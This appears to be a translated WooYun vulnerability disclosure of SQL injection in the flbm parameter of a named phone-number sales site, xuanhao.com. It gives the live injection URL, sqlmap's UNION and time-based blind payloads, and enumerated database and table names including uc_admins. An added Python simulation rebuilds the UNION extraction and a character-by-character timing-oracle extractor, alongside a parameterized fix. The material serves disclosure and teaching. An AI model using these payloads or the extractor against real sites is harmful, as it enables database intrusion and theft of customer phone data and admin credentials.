
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143463

Title: 选号网 (xuanhao.com) official site SQL time-based blind injection (8 databases + 236 tables + all phone numbers leakable + ucadmin)

Vendor: 选号网

Author: 路人甲

Submitted: 2015-09-28 09:10

Fix time: 2015-11-12 09:12

Published: 2015-11-12 09:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4


Vulnerability details

Disclosure status:

2015-09-28: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-12: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As per the title.
北京选号网 (Beijing Xuanhao) is the largest and most complete sales base for Beijing mobile phone numbers, with hundreds of thousands of Beijing numbers on sale at low prices, covering all kinds of Beijing 全球通, 动感地带, 神州行畅听卡, 大众卡, UP新势力, 如意通, 无限通...

Detailed description:

Injection point

http://www.xuanhao.com/spxx/liantong.php?rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105&hd=&jg=&sw=


Data (sqlmap output; the flbm parameter is injectable both through a UNION query and through time-based blind injection)

Place: GET
Parameter: flbm
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=-5282' UNION SELECT CONCAT(0x3a6670693a,0x50797a75745578684766,0x3a636a713a), NULL, NULL# AND 'gXVh'='gXVh&hd=&jg=&sw=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105' AND SLEEP(5) AND 'BChR'='BChR&hd=&jg=&sw=
---
[17:24:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.11, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[17:24:50] [INFO] fetching current user
current user: '28_2011xuan@localhost'
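The two sqlmap techniques above, rebuilt as an added example that is not part of the original report and not xuanhao.com's own code. A local SQLite database stands in for the MySQL back end: SLEEP() is registered by hand, || replaces CONCAT(), unicode()/substr() replace ORD()/SUBSTRING(), and the UNION payload re-closes the string with AND 'gXVh'='gXVh' instead of relying on MySQL's # comment. Only hao_number, uc_admins and the flbm parameter come from the page; the query shape, the column names and the rows are assumptions. The block puts the concatenated query beside its parameterized form, performs the marker-wrapped UNION extraction, and then recovers a string character by character through the timing oracle that a blind injection relies on.

```python
"""Simulation of the flbm injection from the report, on a local SQLite DB.

Constructed example: hao_number, uc_admins and flbm appear in the report;
the column names, the rows and the query shape are assumptions. SQLite
stands in for MySQL, so SLEEP() is registered by hand, || replaces CONCAT()
and unicode()/substr() replace ORD()/SUBSTRING().
"""
import sqlite3
import time

SLEEP_SECONDS = 0.02  # delay the injected SLEEP() asks for (sqlmap used 5 s)


def build_db():
    """In-memory stand-in for the js_xuanhao schema with constructed rows."""
    conn = sqlite3.connect(":memory:")
    # MySQL's SLEEP(n) sleeps n seconds and returns 0; emulate it for SQLite.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE hao_number (number TEXT, price INTEGER, flbm TEXT);
        INSERT INTO hao_number VALUES ('13000000001', 200, '0105');
        INSERT INTO hao_number VALUES ('13000000002', 980, '0106');
        CREATE TABLE uc_admins (username TEXT, password TEXT);
        INSERT INTO uc_admins VALUES ('admin', 'not-a-real-hash');
    """)
    return conn


def vulnerable_listing(conn, flbm):
    """liantong.php-style lookup built by string concatenation (assumed shape):
    the quote inside flbm terminates the literal and the rest becomes SQL."""
    sql = f"SELECT number, price, flbm FROM hao_number WHERE flbm='{flbm}'"
    return conn.execute(sql).fetchall()


def hardened_listing(conn, flbm):
    """Same lookup with a bound parameter: flbm is data, never SQL."""
    sql = "SELECT number, price, flbm FROM hao_number WHERE flbm=?"
    return conn.execute(sql, (flbm,)).fetchall()


def union_payload(expr):
    """UNION payload in sqlmap's shape (3 columns, marker-wrapped value).
    The tail AND 'gXVh'='gXVh re-closes the quote, so no # comment is needed."""
    return f"-5282' UNION SELECT {expr}, NULL, NULL AND 'gXVh'='gXVh"


def time_oracle(conn, condition):
    """Yes/no question over the timing side channel: the page only sleeps
    when `condition` is true. CASE makes the delay explicit instead of
    relying on AND short-circuiting (MySQL form: IF(cond, SLEEP(5), 0))."""
    payload = (f"0105' AND SLEEP(CASE WHEN ({condition}) THEN {SLEEP_SECONDS} "
               f"ELSE 0 END) AND 'BChR'='BChR")
    start = time.perf_counter()
    vulnerable_listing(conn, payload)
    return time.perf_counter() - start >= SLEEP_SECONDS * 0.8


def blind_extract(conn, subquery, max_len=32):
    """Recover the string returned by `subquery` one character at a time,
    binary-searching each code point with about seven timing probes."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end substr() gives '' and unicode('') is NULL; coalesce
            # to 0 so the search converges on 0, which marks the end of string.
            cond = f"coalesce(unicode(substr(({subquery}), {pos}, 1)), 0) > {mid}"
            if time_oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    print("normal:  ", vulnerable_listing(db, "0105"))
    print("union:   ", vulnerable_listing(db, union_payload(
        "':fpi:' || (SELECT username FROM uc_admins LIMIT 1) || ':cjq:'")))
    print("hardened:", hardened_listing(db, union_payload("'x'")))
    print("blind:   ", blind_extract(db, "SELECT username FROM uc_admins LIMIT 1"))
```

The markers ':fpi:' and ':cjq:' mirror the hex constants 0x3a6670693a and 0x3a636a713a in sqlmap's UNION payload; they let the tool find its value in an arbitrary page. The timing oracle is deliberately built with CASE rather than a bare AND SLEEP(), so that a false condition never sleeps regardless of how the engine orders WHERE terms; the threshold of 80% of the requested delay leaves headroom for timer jitter while staying far above the cost of the real query.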


8 databases

available databases [8]:
[*] 15_testxh
[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] information_schema
[*] js_xuanhao
[*] test
[*] xuanhaodotcom


220-odd tables

Database: js_xuanhao
[29 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
| hao_news_category |
| hao_number |
| hao_numberbak |
| ... omitted ... |
| hao_xwxq |
| hao_xwztml |
| hao_zxzx |
+---------------------------------------+
Database: 47_szxuanhao
[33 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_glry |
| hao_glrydl |
| hao_glryqx_category |
| hao_glryxs |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
| hao_news_category |
| hao_number |
| ... omitted ... |
+---------------------------------------+
Database: 46_gdxuanhao
[33 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_glry |
| hao_glrydl |
| hao_glryqx_category |
| hao_glryxs |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
| ... omitted ... |
+---------------------------------------+
Database: test
[19 tables]
+---------------------------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| s |
| ... omitted ... |
+---------------------------------------+
Database: xuanhaodotcom
[8 tables]
+---------------------------------------+
| c_category |
| c_company |
| c_glry |
| c_glrydl |
| c_storage |
| ... omitted ... |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| ... omitted ... |
+---------------------------------------+


Why "all phone numbers": four of the databases are number-selection (选号) databases

[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] js_xuanhao


hao_number


uc_admins


Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused the report